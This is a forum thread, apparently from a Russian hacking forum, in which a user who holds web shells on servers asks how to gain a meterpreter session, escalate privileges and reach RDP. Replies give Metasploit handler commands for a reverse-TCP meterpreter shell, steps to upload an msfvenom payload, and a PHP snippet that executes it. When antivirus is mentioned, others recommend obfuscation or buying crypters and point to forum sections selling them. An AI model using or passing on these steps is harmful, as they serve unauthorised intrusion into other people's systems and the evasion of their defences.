Привет всем. Завалялось немного вэб шеллов. Вопрос: как с помощью вэб шелла получить meterpreter сессию? Нужно повысить привилегии и получить доступ по rdp
-
XSS.stack #1 – первый литературный журнал от юзеров форума
web shells
- Автор темы SlEpOy_SnIpEr
- Дата начала
1) создай файл шелл под нужную ось через msfvenom
2) запусти:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcpset
LHOST ваш_IPset
LPORT порт
exploit
3) загрузи полученный shell из msfvenom на сервер к которому у тебя есть веб шелл доступ
4) напиши php код c помощью которого будет запускатся шелл на стороне сервера
что то типа этого:
5) profit = meterpreter сесия получена
2) запусти:
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcpset
LHOST ваш_IPset
LPORT порт
exploit
3) загрузи полученный shell из msfvenom на сервер к которому у тебя есть веб шелл доступ
4) напиши php код c помощью которого будет запускатся шелл на стороне сервера
что то типа этого:
Код:
<?php
$file = 'shell.elf';
$command = "./$file";
$output = exec($command, $outputArray, $returnVar);
echo "Результат выполнения команды: $output";
if ($returnVar !== 0) {
echo "Ошибка выполнения команды: $output";
} else {
echo "Команда выполнена успешно!";
}
?>- Автор темы
- Добавить закладку
- #3
Операционка windows. Полезные нагрузки палятся видимо авером
Так обфусцируй payload минимально. Или крипт купи, это не так дорого вроде.
Could you recommend some crypto or could you send a reference to learn more about it? thanks
/forums/120/ - discussion of free crypters/obfuscators/packers options
/forums/104/ - paid options could be purchased here, however I cannot give contacts of certain people because I do not have much experience of negotiating with sellers of such services
Thanks a lot mate, very helpful, i'll check!
you're welcome
